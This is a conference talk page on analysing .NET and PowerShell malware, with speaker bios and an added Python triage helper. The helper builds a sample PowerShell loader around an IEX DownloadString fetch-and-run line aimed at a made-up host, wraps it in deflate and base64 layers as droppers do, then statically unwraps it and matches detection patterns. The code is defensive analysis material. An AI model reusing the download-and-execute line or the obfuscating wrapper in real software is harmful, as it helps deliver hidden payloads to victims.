The TAO of .NET and PowerShell malware analysis

Wednesday 30 September 15:00 - 15:30, Green room

Santiago Pontiroli (Kaspersky Lab)
Roberto Martinez (Kaspersky Lab)

  download slides (PDF)

With the ubiquitous adoption of Microsoft's .NET and PowerShell frameworks, an ever-increasing number of software development and IT ninjas have joined a nascent tradition of professionals leveraging these powerful environments for added efficiency in their everyday jobs. With a wide array of libraries and cmdlets at their fingertips, the need to reinvent the wheel is long forgotten.

Of course, malware writers are not far behind - they too have seen the light and are eager to use these convenient tools against us. Whether it's for everyday ransomware or state-sponsored targeted campaigns, cybercriminals are now emboldened by a new arsenal that enables them to adapt with ease and agility. Are you ready to defend yourself against this emerging threat?

It's time to understand our adversaries' capabilities. We'll analyse select in-the-wild malware samples, picking apart the inner workings of these dastardly creations. We'll introduce the cloaking mechanisms adopted by cybercriminals, moving beyond the managed code that runs inside the .NET and PowerShell runtimes to the packers, obfuscators and crypters that are layered on top of these frameworks in order to baffle malware analysts and forensic investigators.
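As an added illustration of the kind of layering the talk refers to, here is a small triage helper written for this page (it is not code from the speakers or from Kaspersky Lab). It builds a constructed PowerShell loader of a shape commonly seen in the wild, a raw-deflated, base64-embedded payload wrapped in a DeflateStream decompression stub and passed to `powershell.exe -EncodedCommand`, then peels the layers back and scores the usual indicators. The inner one-liner and its URL are made up; `example.invalid` is a reserved, non-resolving name, and the stub layout is an assumption about typical dropper structure, not a quoted sample.

```python
import base64
import re
import zlib

# Constructed sample, NOT a real malware sample: a typical one-line
# downloader pointing at a reserved, non-resolving host (assumption).
INNER_SCRIPT = (
    "IEX (New-Object Net.WebClient).DownloadString("
    "'http://example.invalid/stage2.ps1')"
)


def build_sample_encoded_command(inner: str) -> str:
    """Wrap a script the way many droppers do: raw-deflate it, base64 it,
    embed it in a DeflateStream decompression stub, then encode the whole
    stub as UTF-16LE base64 for `powershell.exe -EncodedCommand`."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # -15: raw deflate, matches .NET DeflateStream
    raw = comp.compress(inner.encode("utf-8")) + comp.flush()
    b64 = base64.b64encode(raw).decode("ascii")
    stub = (
        "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('" + b64 + "'));"
        "IEX (New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream("
        "$s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()"
    )
    return base64.b64encode(stub.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(arg: str) -> str:
    """-EncodedCommand carries base64 of the UTF-16LE script text."""
    return base64.b64decode(arg).decode("utf-16-le")


_B64_LITERAL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def unwrap_layer(script: str):
    """Decode the first embedded FromBase64String literal, inflating it when
    the surrounding script names DeflateStream/GZipStream. Returns the
    decoded text, or None when no further layer is present."""
    m = _B64_LITERAL.search(script)
    if not m:
        return None
    data = base64.b64decode(m.group(1))
    if "DeflateStream" in script:
        data = zlib.decompress(data, -15)
    elif "GZipStream" in script:
        data = zlib.decompress(data, 16 + zlib.MAX_WBITS)
    # Nested layers may themselves be UTF-16LE (another -EncodedCommand) or plain UTF-8.
    if len(data) >= 2 and data[1:2] == b"\x00":
        return data.decode("utf-16-le", errors="replace")
    return data.decode("utf-8", errors="replace")


def unwrap_all(encoded_arg: str, max_layers: int = 10) -> list:
    """Return every layer from the outer -EncodedCommand inward."""
    layers = [decode_encoded_command(encoded_arg)]
    while len(layers) < max_layers:
        nxt = unwrap_layer(layers[-1])
        if nxt is None:
            break
        layers.append(nxt)
    return layers


# None of these is malicious on its own; several together in one command
# line is what makes an analyst look closer.
INDICATORS = {
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
    "embedded_base64": re.compile(r"FromBase64String", re.I),
    "in_memory_decompress": re.compile(r"DeflateStream|GZipStream", re.I),
    "char_casting": re.compile(r"\[char\]\s*\d+", re.I),
    "backtick_splitting": re.compile(r"`[A-Za-z]"),
}


def triage(encoded_arg: str) -> dict:
    """Unwrap all layers, flag indicators seen in any layer, and pull URLs."""
    layers = unwrap_all(encoded_arg)
    hits = {name: any(rx.search(layer) for layer in layers) for name, rx in INDICATORS.items()}
    urls = sorted({u for layer in layers for u in re.findall(r"https?://[^\s'\"()]+", layer)})
    return {"layers": len(layers), "indicators": hits, "urls": urls, "final": layers[-1]}


if __name__ == "__main__":
    sample = build_sample_encoded_command(INNER_SCRIPT)
    for key, value in triage(sample).items():
        print(f"{key}: {value}")
```

The decoder never executes anything: each layer is decoded statically, so it is safe to run on a real command line lifted from a process-creation log. Obfuscators that build strings at runtime (character-code arithmetic, `-join` of reversed arrays, `-bxor` loops) will stop the static unwrapping at that layer, which is exactly where the indicator counts in the report tell you to switch to dynamic analysis.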

Knowing is not enough; we must apply. Willing is not enough; we must do. With a plethora of post exploitation and lateral movement tools created and customized every day in rapid application development environments and high-level programming languages, defending against this kind of pervasive opponent is a full-time job.


Santiago Pontiroli

Santiago Pontiroli joined Kaspersky Lab as a Security Researcher in October 2013. His principal responsibilities include the analysis and investigation of security threats in the SOLA region (South of Latin America), web application security, the development of automation tools stemming from threat intelligence studies and the reverse engineering of programs with malicious code. Before joining Kaspersky Lab, Santiago served as Development Leader at Accenture for projects such as Site Concept Studio and Avanade Connected Methods, where he supervised all technical aspects of his teams, developed and presented demos on the different platforms and offered technical support to the sales team. Prior to Accenture, Santiago worked as a consultant for several companies, providing support on access control software, system and network administration, server hardening and web application security. Santiago holds degrees in systems engineering and systems analysis from the Universidad Tecnológica Nacional F.R.L.P in Buenos Aires, Argentina. He is fluent in English and Spanish.

@spontiroli

Roberto Martinez

Roberto Martinez joined Kaspersky Lab's Global Research and Analysis Team in April 2012. He is responsible for monitoring and detecting new cyber threats. Martinez is a former security consultant and trainer for governments, military, intelligence agencies, financial institutions and private corporations in Latin America. He is a member of ALAPSI (Latin American Association of Information Security Professionals) in the Incident Response commission. Martinez has extensive experience as a senior instructor in IT and information security, and also as a digital forensics investigator, security researcher and international speaker. He studied at the University of Guadalajara and Tec Milenio (ITESM).

@r0bertmart1nez